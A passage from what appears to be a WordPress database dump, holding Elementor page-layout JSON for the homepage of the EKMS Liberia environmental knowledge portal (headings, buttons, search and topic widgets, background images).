n\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.61)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/blogs-news-and-stories\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19345,2827,'_elementor_version','2.7.5'),(19346,2827,'_elementor_template_type','wp-page'),(19347,2827,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19358,2829,'_wp_page_template','default'),(19359,2829,'_elementor_edit_mode','builder'),(19360,2829,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_